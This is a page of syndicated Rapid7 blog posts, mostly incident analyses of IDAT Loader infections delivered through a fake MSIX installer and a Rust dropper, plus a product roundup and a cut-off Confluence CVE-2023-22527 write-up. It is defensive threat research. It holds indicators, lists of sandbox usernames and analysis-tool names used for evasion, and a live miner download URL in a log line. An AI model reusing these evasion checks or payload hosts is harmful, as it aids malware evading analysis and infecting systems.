Tag Archives: Managed Detection and Response (MDR)

Stories from the SOC Part 2: MSIX Installer Utilizes Telegram Bot to Execute IDAT Loader

2024-04-10 Tom Elkins

Post Syndicated from Tom Elkins original https://blog.rapid7.com/2024/04/10/stories-from-the-soc-part-2-msix-installer-utilizes-telegram-bot-to-execute-idat-loader/

Stories from the SOC Part 2: MSIX Installer Utilizes Telegram Bot to Execute IDAT Loader

Rapid7’s Managed Detection and Response (MDR) team continuously monitors our customers’ environments, identifying emerging threats and developing new detections.

In August 2023, Rapid7 identified a new malware loader named the IDAT Loader. Malware loaders are a type of malicious software designed to deliver and execute additional malware onto a victim’s system. What made the IDAT Loader unique was the way in which it retrieved data from PNG files, searching for offsets beginning with 49 44 41 54 (IDAT).

In part one of our blog series, we discussed how a Rust based application was used to download and execute the IDAT Loader. In part two of this series, we will be providing analysis of how an MSIX installer led to the download and execution of the IDAT Loader.

While utilization of MSIX packages by threat actors to distribute malicious code is not new, what distinguished this incident was the attack flow of the compromise. Based on the recent tactics, techniques and procedures observed (TTPs), we believe the activity is associated with financially motivated threat groups.

Stories from the SOC Part 2: MSIX Installer Utilizes Telegram Bot to Execute IDAT Loader — **Figure 1 – Attack Flow**

MSIX Installers

In January of 2024, Red Canary released an article attributing different threat actors to various deployments of malicious MSIX installers. The MSIX installers employed a variety of techniques to deliver initial payloads onto compromised systems.

All the infections began with users navigating to typo squatted URLs after using search engines to find specific software package downloads. Typo squatting aka URL hijacking is a specific technique in which threat actors register domain names that closely resemble legitimate domain names in order to deceive users. Threat actors mimic the layout of the legitimate websites in order to lure the users into downloading their initial payloads.

Additionally, threat actors utilize a technique known as SEO poisoning, enabling the threat actors to ensure their malicious sites appear near the top of search results for users.

Technical Analysis

Typo Squatted Malvertising

In our most recent incident involving the IDAT Loader, Rapid7 observed a user downloading an installer for an application named ‘Room Planner’ from a website posing as the legitimate site. The user was searching Google for the application ‘Room Planner’ and clicked on the URL hxxps://roomplannerapp.cn[.]com. Upon user interaction, the users browser was directed to download an MSIX package, Room_Planner-x86.msix (SHA256: 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23).

PowerShell Scripts

During execution of the MSIX file, a PowerShell script, 1.ps1 , was dropped into the folder path C:\Program Files\WindowsApps\RoomPlanner.RoomPlanner_7.2.0.0_x86__s3garmmmnyfa0\ and executed. Rapid7 determined that it does the following:

Obtain the IP address of the compromised asset
Send the IP address of the compromised asset to a Telegram bot
Retrieve an additional PowerShell script that is hosted on the Telegram bot
Delete the message containing the IP address of the compromised asset
Invoke the PowerShell script retrieved from the Telegram bot

In a controlled environment, Rapid7 visited the Telegram bot hosting the next stage PowerShell script and determined that it did the following:

Retrieve the IP address of the compromised asset by using Invoke-RestMethod which retrieved data from the domain icanhazip[.]com
Enumerate the compromised assets Operating System, domain and AV products
Send the information to the Telegram bot
Create a randomly generated 8 character name, assigning it to the variable $JAM
Download a gpg file from URL hxxps://read-holy-quran[.]group/ld/cr.tar.gpg, saving the file to %APPDATA% saving it as the name assigned to the $JAM variable
Decrypt the contents of the gpg file using the passphrase ‘riudswrk’, saving them into a newly created folder named after the $JAM variable within C:\ProgramData\$JAM\cr\ as a .RAR archive file
Utilize tar to unarchive the RAR file
Start an executable named run.exe from within the newly created folder
Create a link (.lnk) file within the Startup folder, named after the randomly generated name stored in variable $JAM, pointing towards run.exe stored in file path C:\ProgramData\$JAM\cr\ in order to create persistence
Read in another PowerShell script hosted on a Pastebin site, hxxps://pastebin.pl/view/raw/a137d133 using downloadstring and execute its contents (the PowerShell script is a tool used to bypass AMSI) with IEX (Invoke-Expression)
Download data from URL hxxps://kalpanastickerbindi[.]com/1.jpg and reflectively load the contents and execute the program starting at function EntryPoint (indicating the downloaded data is a .NET Assembly binary)

After analysis of the AMSI (Anti Malware Scan Interface) bypass tool, we observed that it was a custom tool giving credit to a website, hxxps://rastamosue[.]memory-patching-amsi-bypass, which discusses how to create a program that can bypass AMSI scanning.

AMSI is a scanning tool that is designed to scan scripts for potentially malicious code after a scripting engine attempts to run the script. If the content is deemed malicious, AMSI will tell the scripting engine (in this case PowerShell) to not run the code.

RAR Contents

Contained within the RAR file were the following files:

Files	Description
Dharna.7z	File contains the encrypted IDAT Loader config
Guar.xslx	File contains random bytes, not used during infection
Run.exe	Renamed WebEx executable file, used to sideload DLL WbxTrace.dll
Msvcp140.dll	Benign DLL read by Run.exe
PtMgr.dll	Benign DLL read by Run.exe
Ptusredt.dll	Benign DLL read by Run.exe
Vcruntime140.dll	Benign DLL read by Run.exe
Wbxtrace.dll	Corrupted WebEx DLL containing IDAT Loader
WCLDll.dll	Benign WebEx DLL read by Run.exe

After analysis of the folder contents, Rapid7 determined that one of the DLLs, wbxtrace.dll, had a corrupted signature, indicating that its original code was tampered with. After analyzing the modified WebEx DLL, wbxtrace.dll, Rapid7 determined the DLL contained suspicious functions similar to the IDAT Loader.

Upon extracting the contents of the RAR file to the directory path C:\ProgramData\cr, the PowerShell script executes the run.exe executable.

The IDAT Loader

During execution of run.exe (a legitimate renamed WebEx executable), the executable sideloads the tampered WebEx DLL, wbxtrace.dll. Once the DLL wbxtrace.dll is loaded, the DLL executes a section of new code containing the IDAT Loader, which proceeds to read in contents from within dharna.7z.

After reading in the contents from dharna.7z, the IDAT Loader searches for the offset 49 44 41 54 (IDAT) followed by C6 A5 79 EA. After locating this offset, the loader reads in the following 4 bytes, E1 4E 91 99, which are used as the decryption key for decrypting the rest of the contents. Contained within the decrypted contents are additional code, specific DLL and Executable file paths as well as the final encrypted payload that is decrypted with a 200 byte XOR key.

The IDAT loader employs advanced techniques such as Process Doppelgänging and the Heaven’s Gate technique in order to initiate new processes and inject additional code. This strategy enables the loader to evade antivirus detections and successfully load the final stage, SecTop RAT into the newly created process, msbuild.exe.

We recently developed a configuration extractor capable of decrypting the final payload concealed within the encrypted files containing the IDAT (49 44 41 54) sections. The configuration extractor can be found on our Rapid7 Labs github page.

After using the configuration extractor, we analyzed the SecTop RAT and determined that it communicates with the IP address 91.215.85[.]66.

Rapid7 Customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on activity described:

Attacker Technique – Advanced Installer .MSI Executable Spawns Powershell
Suspicious Process – Execution From Root of ProgramData
Suspicious Process – PowerShell Uncommon Upper And Lower Case Combinations
Suspicious Process – explorer.exe in Non-Standard Location

MITRE ATT&CK Techniques

Tactics	Techniques	Details
Execution	Command and Scripting Interpreter: PowerShell (T1059.001)	1.ps1 is used to fingerprint compromised machine and execute additional PowerShell scripts
Execution	Native API (T1106)	The IDAT injector and IDAT loader are using Heaven’s Gate technique to evade detection
Execution	User Execution: Malicious File (T1204.002)	User executes the binary Room_Planner-x86.msix
Defense Evasion	Masquerading: Match Legitimate Name or Location (T1036.005)	Malicious MSIX masquerades as legitimate Room Planner installer
Defense Evasion	Deobfuscate/Decode Files or Information (T1140)	gpg.exe used to decrypt cr.tar.gpg
Defense Evasion	Hijack Execution Flow: DLL Search Order Hijacking (T1574.001)	run.exe loads a malicious wbxtrace.dll
Defense Evasion	Reflective Code Loading (T1620)	PowerShell script loads a binary hosted at kalpanastickerbindi[.]com/1.jpg
Defense Evasion	Process Injection (T1055)	IDAT injector implements NtCreateSection + NtMapViewOfSection Code Injection technique to inject into cmd.exe process
Defense Evasion	Process Injection: Process Doppelgänging (T1055.013)	IDAT loader implements Process Doppelgänging technique to load the SecTop RAT
Defense Evasion	Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)	Execution delays are performed by several stages throughout the attack flow

IOCs

IOC	Sha256	Notes
Room_Planner-x86.msix	6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23	Initial installer containing PowerShell scripts
1.ps1	928bd805b924ebe43169ad6d670acb2dfe45722e17d461ff0394852b82862d23	Dropped and executed by the Room_Planner-x86.msix
wbxtrace.dll	1D0DAF989CF28852342B1C0DFEE05374860E1300106FF7788BBA26D84549B845	Malicious DLL executed by run.exe, the renamed Cisco Webex binary
Dharna.7z	B7469153DC92BF5DE9BF2521D9550DF21BC4574D0D0CFC919FF26D1071C000B2	Encrypted payload decrypted by wbxtrace.dll
read-holy-quran[.]group/ld/cr.tar.gpg		Hosts GPG file containing RAR file
kalpanastickerbindi[.]com/1.jpg		Hosts .NET executable downloaded from API Bot PowerShell script
91.215.85[.]66		SecTop RAT domain

References

Article	URL
MSIX installer malware delivery on the rise across multiple campaigns	https://redcanary.com/blog/msix-installers/
Process Doppelgänging	https://malware.news/t/uncovering-the-serpent/76253
Analysis of “Heaven’s Gate” part 1	https://sachiel-archangel.medium.com/analysis-of-heavens-gate-part-1-62cca0ace6f0
Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers	https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/
Stories from the SOC Part 1: IDAT Loader to BruteRatel	https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/

What’s New in Rapid7 Products & Services: Q1 2024 in Review

2024-04-04 Margaret Wei

Post Syndicated from Margaret Wei original https://blog.rapid7.com/2024/04/04/whats-new-in-rapid7-products-services-q1-2024-in-review/

What’s New in Rapid7 Products & Services: Q1 2024 in Review

We kicked off 2024 with a continued focus on bringing security professionals (which if you’re reading this blog, is likely you!) the tools and functionality needed to anticipate risks, pinpoint threats, and respond faster with confidence. Below we’ve highlighted some key releases and updates from this past quarter across Rapid7 products and services—including InsightCloudSec, InsightVM, InsightIDR, Rapid7 Labs, and our managed services.

Anticipate Imminent Threats Across Your Environment

Monitor, remediate, and takedown threats with Managed Digital Risk Protection (DRP)

Rapid7’s new Managed Digital Risk Protection (DRP) service provides expert monitoring and remediation of external threats across the clear, deep, and dark web to prevent attacks earlier.

Now available in our highest tier of Managed Threat Complete and as an add on for all other Managed D&R customers, Managed DRP extends your team with Rapid7 security experts to:

Identify the first signs of a cyber threat to prevent a breach
Rapidly remediate and takedown threats to minimize exposure
Protect against ransomware data leakage, phishing, credential leakage, data leakage, and provide dark web monitoring

Read more about the benefits of Managed DRP in our blog here.

What’s New in Rapid7 Products & Services: Q1 2024 in Review

Ensure safe AI development in the cloud with Rapid7 AI/ML Security Best Practices

We’ve recently expanded InsightCloudSec’s support for GenAI development and training services (including AWS Bedrock, Azure OpenAI Service and GCP Vertex) to provide more coverage so teams can effectively identify, assess, and quickly act to resolve risks related to AI/ML development.

This expanded generative AI coverage enriches our proprietary compliance pack, Rapid7 AI/ML Security Best Practices, which continuously assesses your environment through event-driven harvesting to ensure your team is safely developing with AI in a manner that won’t leave you exposed to common risks like data leakage, model poisoning, and more.

As with all critical resources connected to your InsightCloudSec environment, these risks are enriched with Layered Context to automatically prioritize AI/ML risk based on exploitability and potential impact. They’re also continuously monitored for effective permissions and actual usage to rightsize permissions to ensure alignment with LPA. In addition to this extensive visibility, InsightCloudSec offers native automation to alert on and even remediate risk across your environment without the need for human intervention.

Stay ahead of emerging threats with insights and guidance from Rapid7 Labs

In the first quarter of this year, Rapid7 initiated the Emergent Threat Response (ETR) process for 12 different threats, including (but not limited to):

Zero-day exploitation of Ivanti Connect Secure and Ivanti Pulse Secure gateways, the former of which has historically been targeted by both financially motivated and state-sponsored threat actors in addition to low-skilled attackers.
Critical CVEs affecting outdated versions of Atlassian Confluence and VMware vCenter Server, both widely deployed products in corporate environments that have been high-value targets for adversaries, including in large-scale ransomware campaigns.
High-risk authentication bypass and remote code execution vulnerabilities in ConnectWise ScreenConnect, widely used software with potential for large-scale ransomware attacks, providing coverage before CVE identifiers were assigned.
Two authentication bypass vulnerabilities in JetBrains TeamCity CI/CD server that were discovered by Rapid7’s research team.

Rapid7’s ETR program is a cross-team effort to deliver fast, expert analysis alongside first-rate security content for the highest-priority security threats to help you understand any potential exposure and act quickly to defend your network. Keep up with future ETRs on our blog here.

Pinpoint Critical and Actionable Insights to Effectively and Confidently Respond

Introducing the newest tier of Managed Threat Complete

Since we released Managed Threat Complete last year, organizations all over the globe have unified their vulnerability management programs with their threat detection and response programs. Now, teams have a unified view into the full kill chain and a tailored service to turbocharge their program, mitigate the most pressing risks and eliminate threats.

Managed Threat Complete Ultimate goes beyond our previously available Managed Threat Complete bundles to include:

Managed Digital Risk Protection for monitoring and remediation of threats across the clear, deep, and dark web
Managed Vulnerability Management for clarity guidance to remediate the highest priority risk
Velociraptor, Rapid7’s leading open-source DFIR framework, from monitoring and hunting to in-depth investigations into potential threats, access the tool that is leveraged by our Incident Response experts on behalf of our managed customers
Ransomware Prevention for recognizing threats and stopping attacks before they happen with multi-layered prevention (coming soon – stay tuned)

Get to the data you need faster with new Log Search and Investigation features in InsightIDR

Our latest enhancements to Log Search and Investigations will help drive efficiency for your team and give you time back in your day-to-day—and when you really need it in the heat of an incident. Faster search times, easier-to-write queries, and intuitive recommendations will help you find event trends within your data and save you time without sacrificing results.

Triage investigations faster with log data readily accessible from the investigations timeline – with a click of the new “view log entry” button you’ll instantly see the context and log data behind an associated alert.
Create precise queries quickly with new automatic suggestions – as you type in Log Search, the query bar will automatically suggest the elements of LEQL that you can use in your query to get to the data you need—like users, IP addresses, and processes—faster.
Save time sifting through search results with new LEQL ‘select’ clause – define exactly what keys to return in the search results so you can quickly answer questions from log data and avoid superfluous information.

Easily view vital cloud alert context with Simplified Cloud Threat Alerts

This quarter we launched Simplified Cloud Threat Alerts within InsightIDR to make it easier to quickly understand what a cloud alert – like those from AWS GuardDuty – means, which can be a daunting task for even the most experienced analysts due to the scale and complexity of cloud environments.

With this new feature, you can view details and known issues with the resources (e.g. assets, users, etc.) implicated in the alert and have clarity on the steps that should be taken to appropriately respond to the alert. This will help you:

Quickly understand what a given cloud resource is, its intended purpose, what applications it supports and who “owns” it.
Get a clear picture around what an alert means, what next steps to take to verify the alert, or how to respond if the alert is in fact malicious.
Prioritize response efforts based on potential impact with insight into whether or not the compromised resource is misconfigured, has active vulnerabilities, or has been recently updated in a manner that signals potential pre-attack reconnaissance.

A growing library of actionable detections in InsightIDR

In Q1 2024 we added 1,349 new detection rules. See them in-product or visit the Detection Library for descriptions and recommendations.

Stay tuned!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in product and service investments at Rapid7.

Stories from the SoC Part 1: IDAT Loader to BruteRatel

2024-03-28 Tom Elkins

Post Syndicated from Tom Elkins original https://blog.rapid7.com/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/

Stories from the SoC Part 1: IDAT Loader to BruteRatel

Rapid7’s Managed Detection and Response (MDR) team continuously monitors our customers’ environments, identifying emerging threats and developing new detections.

At the time, the loader was seen being distributed via a FakeUpdates campaign. In two recent investigations, Rapid7’s Managed Detection & Response (MDR) observed the loader being used again. Based on the recent tactics, techniques and procedures observed (TTPs), we believe the activity is associated with financially motivated threat groups.

In this two-part blog series, we will examine the attack chain observed in two separate incidents, offering in-depth analysis of the malicious behavior detected. The incidents discussed in the series stem from opportunistic infections, wherein threat groups utilize malvertising and drive-by downloads in order to have their initial malicious payloads executed by users.

This first installment focuses on an incident triggered by a user downloading an application, which subsequently triggered the execution of the IDAT Loader and the BruteRatel C4 (BRC4) framework following initial access to a compromised asset.

Technical Analysis

Stage 1: The drive by

In a recent incident, Rapid7 observed a user navigate to a website that hosted popular Korean shows. Upon attempting to watch the video, the website redirected the user through various websites before ultimately directing the users browser into downloading a supposed application named AppFile_v1.1.exe. Threat actors utilize website redirection in order to make it difficult for network technologies to scan links for malicious content.

Stories from the SoC Part 1: IDAT Loader to BruteRatel — Figure 1 – Attack Flow

Binary Analysis: Shaking off the Rust

After initial analysis of the binary AppFile_v1.1.exe, Rapid7 determined the program was written in Rust.

During execution, the program will query the name of the executable. If the executable’s name matches AppFile_v1.1.exe, the program will continue. Most sandboxes will rename the files (sometimes based on the hash) of submitted programs. This technique helps to evade sandboxes, ensuring the malicious functions are not run. If the program name does not match its original intended name, the program will quit and display an error message, showing an image that a web page could not be loaded.

Next, the program will check to see if it resides within a debugger by querying the function IsDebuggerPresent. If the check passes, it will decrypt a hard-coded string that resolves to “Normal”. If not, the program will decrypt another hard-coded string that resolves to “Debugger” and then exit.

Once the anti-debug check passes, the program retrieves an encrypted string and XOR decrypts it, revealing the URL hxxps://cdn-network-services-001[.]com/update/minor/1/release.json.

The program will then perform anti-analysis techniques, specifically querying for the username and open process and comparing them to a list of known sandbox usernames and tools. The list of usernames and processes are also XOR-encrypted and are decrypted at runtime. Based on Open Source Intelligence, we determined that another malware known as Serpent Stealer contained a similar table of user names. See Appendix A below for the complete list.

If any of the checks fail, the program will exit and display the message box. If the checks pass, the program will then utilize Rust library tokio-1.32.0/src/net/tcp/stream.rs in order to read in data from the decrypted URL and store the contents in memory.

Upon initial analysis, the downloaded data appeared to be encoded. Subsequently, the data is passed into a function tasked with decoding it. The decoding process involves reading each byte and subtracting the hexadecimal value 32.

After the downloaded data is decoded, the program XOR decrypts another string, revealing a path to the executable C:\Windows\system32\werfault.exe. Using syscalls, the program then does the following:

After analysis of the decoded binary, we determined that it was another executable written in Rust. The program’s executable contains a zip archive within the .rdata section. During execution, the program generates a folder with a randomly generated name in the %TEMP% directory and extracts the contents of the archive into this newly created folder.

The archive contained a DLL, msidcrl40.dll, an executable named live.exe and an encrypted file, dynatron.mdb. Initial analysis of the DLL msidcrl40.dll showed that the DLL’s signature was corrupted, indicating the DLL was tampered with. Further analysis showed that the DLL contained code related to the IDAT Loader.

IDAT Loader

After the rust program drops the contents of the zip archive, it then proceeds to execute the binary live.exe, which sideloads the DLL, msidcrl40.dll, containing the IDAT Loader code.

After the binary live.exe loads the DLL msidcrl40.dll, the DLL executes the function containing the IDAT Loader. The IDAT then reads in encrypted contents contained within the file dynatron.mdb, searching for the offset 49 44 41 54 (IDAT) followed by C6 A5 79 EA. After decrypting the contents, the loader will then decompress the contents using RtlDecompressBuffer and execute additional code into a newly created process, cmd.exe.

The IDAT loader employs advanced techniques such as Process Doppelgänging and the Heaven’s Gate technique in order to initiate new processes and inject additional code.

The code contained within cmd.exe is responsible for decrypting the final payload and injecting it into a newly created process, msbuild.exe.

Using our IDAT Loader config extractor, we were able to extract the final payload and determined that it was SecTop RAT. During execution of the SecTop RAT, we observed that it communicated with the IP address 152.89.217[.]215.

Post-Exploitation: BRC4 Deployment

After the SecTop RAT was executed successfully, Rapid7 observed follow-on activity in which the threat actor executed another version of the IDAT loader from within the folder path C:\ProgramData\. We observed the following related files were dropped by the threat actor into C:\ProgramData:

After analysis of the files, we determined that rvm.exe was a renamed executable rvmsetup.exe, a legitimate tool that is a part of the VMWare Tools toolset. The binary is used to join a VMWare source virtual machine to an active directory domain. We also observed that the binary vmtools.dll had a corrupted signature, indicating the binary’s code was tampered with. We observed that the DLL vmtools.dll contained code related to the IDAT Loader.

During execution of the executable, rvm.exe, the program loads vmtools.dll. After vmtools.dll is loaded, the DLL is directed to execute a function that contains the IDAT Loader. The IDAT Loader proceeds to read in contents from within spank.mpg, searching for the same offset, 49 44 41 54 (IDAT) followed by C6 A5 79 EA. After decrypting the contents within spank.mpg, the IDAT Loader spawns a new process, cmd.exe, injecting additional code that is responsible for decrypting the final payload and injecting it into a newly created process, explorer.exe.

Using our static config extractor, we extracted the final payload, a 64-bit executable. During initial analysis of the final payload, we observed that the program utilized the API functions VirtualAlloc and VirtualProtect. During execution of the program, it utilized VirtualAlloc to read in and store additional code, including encrypted data, into a new region of memory. The program then called upon the function VirtualProtect, changing the newly allocated region of memory (containing the new code) to be executable. We also observed the 64 bit executable (obtained from the IDAT Loader python script) had the capability to perform process hollowing by starting a new process, notepad.exe, and injecting the code into the newly created process.

The newly allocated code was responsible for decrypting the encrypted data using RC4, copying the decrypted code into an allocated memory buffer via VirtualAlloc, and setting the memory buffer to have executable permission using VirtualProtect. Rapid7 determined the decrypted code was a Brute Ratel C4 (BRC4) “badger”.

Brute Ratel originated as a post-exploitation tool intended for penetration testers, designed to mimic adversary tactics as of December 2020. Its development aimed to replicate the functionality of established Command and Control (C2) software like Cobalt Strike, Mythic and Sliver. Following a successful compromise of a target, the attacker deploys the Brute Ratel “badger,” tasked with establishing communication with the attacker’s Command and Control domain.

During execution of the BRC4 program, we observed that it reached out to the domain updatenazure[.]com.

After the BRC4 program was executed, we observed the threat actor attempting to enumerate the domain controller by using the command nltest /dclist.

Rapid7 Customers

Network Discovery – Nltest Enumerate Domain Controllers
Suspicious Process – Execution From Root of ProgramData
Suspicious Process – PowerShell Uncommon Upper And Lower Case Combinations
Suspicious Process – explorer.exe in Non-Standard Location

Appendix A: Known Sandbox Usernames and Analysis Tools

Usernames	Processes
hbyldjtckyn1	httpdebuggerui.exe
lubi53an14cu	immunitydebugger.exe
rgzcbuyrznreg	ksdumperclient.exe
8lnfaai9qdjr	httpanalyzerstdv7.exe
j6sha37ka	ida64.exe
keecfmwgj	32dbg.exe
pwouqdtdq	64dbg.exe
qmis5df7u	protection_id.exe
txwas1m2t	vmsrvc.exe
uox1tzamo	x32dbg.exe
rb5bnfur2	x64dbg.exe
cm0uegn4do	x96dbg.exe
douyo8rv71	prl_cc.exe
paul jones	windbg.exe
pxmduopvyx	scylla.exe
fnbdsldtxy	idau64.exe
gexwjqdjxg	idaq64.exe
gjam1nxxvm	idag64.exe
jcotj17dzx	taskmgr.exe
05kvauqkpqk5	procexp.exe
64f2tkiqo5k5h	procmon.exe
of20xqh4vl	fiddler.exe
harry johnson	dumpcap.exe
4tgiizslims	df5serv.exe
bvjchrpnsxn	ollydbg.exe
kfu0lqwgx5p	rdpclip.exe
nok4zg7zhof	vmusrvc.exe
ogjb6gqgk0o5	qemu-ga.exe
xplyvzr8sgc	vboxtray.exe
ykj0egq7fze	vmtoolsd.exe
ryjijkiroms	pestudio.exe
nzap7ubvas1	vmacthlp.exe
9yjcpseyimh	procexp64.exe
uhuqiuwoefu	wireshark.exe
6o4kyhhjxbir	prl_tools.exe
7wjlgx7pjlw4	importrec.exe
8nl0colnq5bq	vmwaretray.exe
g2dbyldgzz8yo	vmwareuser.exe
pqonjhvwexsst	xenservice.exe
rdhj0cnfevzxf	scylla_x86.exe
xmimmckziitdl	scylla_x64.exe
l3cnbb8ar5b8	vboxservice.exe
vzy4jmh0jw02
21zlucunfi85
sal.rosenburg
defaultaccount
wdagutilityaccount

MITRE ATT&CK Techniques

Tactics	Techniques	Details
Initial Access	Drive-by Compromise (T1189)	Threat Actors utilize drive-by downloads in order to direct browsers to download their initial payloads without users consent
Execution	User Execution: Malicious File (T1204.002)	Users execute the binary AppFile_v1.1.exe
Execution	Native API (T1106)	The IDAT injector and IDAT loader are using Heaven’s Gate technique to evade detection
Defense Evasion	Hijack Execution Flow: DLL Search Order Hijacking (T1574.001)	run.exe loads a malicious wbxtrace.dll
Defense Evasion	Process Injection (T1055)	IDAT injector implements NtCreateSection + NtMapViewOfSection Code Injection technique to inject into cmd.exe process
Defense Evasion	Deobfuscate/Decode Files or Information (T1140)	msidcrl40.dll decrypts dynatron.mdb
Defense Evasion	Process Injection: Process Doppelgänging (T1055.013)	IDAT loader implements Process Doppelgänging technique to load the SecTop RAT
Defense Evasion	Masquerading (T1036)	dynatron.mdb file masqueraded to a .png file
Defense Evasion	Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)	Execution delays are performed by several stages throughout the attack flow

IOCs

IOC	Sha256	Notes
AppFile_v1.1.exe	A3A5E7011335A2284E2D4F73FD464FF129F0C9276878A054C1932BC50608584B	Rust Loader responsible for downloading IDAT Loader
msidcrl40.dll	02D5E281689EC2D4AB8AC19C93321A09113E5D8FA39380A7021580EA1887B7A5	Malicious DLL executed by live.exe
dynatron.mdb	C5C52331B208CAD19DC710786E26AC55090FFCA937410D76C53569D731F0BB92	Encrypted payload decrypted by msidcrl40.dll
vmtools.dll	BEFE0DF365F0E2DC05225470E45FDF03609F098A526D617C478B81AC6BB9147F	Malicious DLL executed by rvm.exe
spank.mpg	E05E561C5118EFDBCA113CA231C527B62E59A4BFFAE3BD374F7B4FCDD10E7D90	Encrypted payload decrypted by vmtools.dll
hxxps://cdn-network-services-001[.]com/update/minor/1/release.json		Downloads additional Rust binary containing IDAT Loader
152.89.217[.]215		SecTop RAT domain
updatenazure[.]com		BRC4 Domain

References

Article	URL
Uncovering the “Serpent”	https://malware.news/t/uncovering-the-serpent/76253
Process Doppelgänging	https://malware.news/t/uncovering-the-serpent/76253
Analysis of “Heaven’s Gate” part 1	https://sachiel-archangel.medium.com/analysis-of-heavens-gate-part-1-62cca0ace6f0
A Deep Dive Into Malicious Direct Syscall Detection	https://www.paloaltonetworks.com/blog/security-operations/a-deep-dive-into-malicious-direct-syscall-detection/
Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers	https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

RCE to Sliver: IR Tales from the Field

2024-02-15 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/02/15/rce-to-sliver-ir-tales-from-the-field/

RCE to Sliver: IR Tales from the Field

*Rapid7 Incident Response consultants Noah Hemker, Tyler Starks, and malware analyst Tom Elkins contributed analysis and insight to this blog.*

Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7 identified evidence of exploitation for CVE-2023-22527 within available Confluence logs. During the investigation, Rapid7 identified cryptomining software and a Sliver Command and Control (C2) payload on in-scope servers. Sliver is a modular C2 framework that provides adversarial emulation capabilities for red teams; however, it’s also frequently abused by threat actors. The Sliver payload was used to action subsequent threat actor objectives within the environment. Without proper security tooling to monitor system network traffic and firewall communications, this activity would have progressed undetected leading to further compromise.

Rapid7 customers

Rapid7 consistently monitors emergent threats to identify areas for new detection opportunities. The recent appearance of Sliver C2 malware prompted Rapid7 teams to conduct a thorough analysis of the techniques being utilized and the potential risks. Rapid7 InsightIDR has an alert rule Suspicious Web Request - Possible Atlassian Confluence CVE-2023-22527 Exploitation available for all IDR customers to detect the usage of the text-inline.vm consistent with the exploitation of CVE-2023-22527. A vulnerability check is also available to InsightVM and Nexpose customers. A Velociraptor artifact to hunt for evidence of Confluence CVE-2023-22527 exploitation is available on the Velociraptor Artifact Exchange here. Read Rapid7’s blog on CVE-2023-22527.

Observed Attacker Behavior

Rapid7 IR began the investigation by triaging available forensic artifacts on the two affected publicly-facing Confluence servers. These servers were both running vulnerable Confluence software versions that were abused to obtain Remote Code Execution (RCE) capabilities. Rapid7 reviewed server access logs to identify the presence of suspicious POST requests consistent with known vulnerabilities, including CVE-2023-22527. This vulnerability is a critical OGNL injection vulnerability that abuses the text-inline.vm component of Confluence by sending a modified POST request to the server.

Evidence showed multiple instances of exploitation of this CVE, however, evidence of an embedded command would not be available within the standard header information logged within access logs. Packet Capture (PCAP) was not available to be reviewed to identify embedded commands, but the identified POST requests are consistent with the exploitation of the CVE.
The following are a few examples of the exploitation of the Confluence CVE found within access logs:

Access.log Entry
POST /template/aui/text-inline.vm HTTP/1.0 200 5961ms 7753 – Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
POST /template/aui/text-inline.vm HTTP/1.0 200 70ms 7750 – Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
POST /template/aui/text-inline.vm HTTP/1.0 200 247ms 7749 – Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0

Evidence showed the execution of a curl command post-exploitation of the CVE resulting in the dropping of cryptomining malware to the system. The IP addresses associated with the malicious POST requests to the Confluence servers matched the IP addresses of the identified curl command. This indicates that the dropped cryptomining malware was directly tied to Confluence CVE exploitation.
As a result of the executed curl command, file w.sh was written to the /tmp/ directory on the system. This file is a bash script used to enumerate the operating system, download cryptomining installation files, and then execute the cryptomining binary. The bash script then executed the wget command to download javs.tar.gz from the IP address 38.6.173[.]11 over port 80. This file was identified to be the XMRigCC cryptomining malware which caused a spike in system resource utilization consistent with cryptomining activity. Service javasgs_miner.service was created on the system and set to run as root to ensure persistence.

The following is a snippet of code contained within w.sh defining communication parameters for the downloading and execution of the XMRigCC binary.

Rapid7 found additional log evidence within Catalina.log that references the download of the above file inside of an HTTP response header. This response registered as ‘invalid’ as it contained characters that could not be accurately interpreted. Evidence confirmed the successful download and execution of the XMRigCC miner, so the above Catalina log may prove useful for analysts to identify additional proof of attempted or successful exploitation.

Catalina Log Entry
WARNING [http-nio-8090-exec-239 url: /rest/table-filter/1.0/service/license; user: Redacted ] org.apache.coyote.http11.Http11Processor.prepareResponse The HTTP response header [X-Cmd-Response] with value [http://38.6.173.11/xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz… ] has been removed from the response because it is invalid

Rapid7 then shifted focus to begin a review of system network connections on both servers. Evidence showed an active connection with known-abused IP address 193.29.13[.]179 communicating over port 8888 from both servers. netstat command output showed that the network connection’s source program was called X-org and was located within the system’s /tmp directory. According to firewall logs, the first identified communication from this server to the malicious IP address aligned with the timestamps of the identified X-org file creation. Rapid7 identified another malicious file residing on the secondary server named X0 Both files shared the same SHA256 hash, indicating that they are the same binary. The hash for these files has been provided below in the IOCs section.

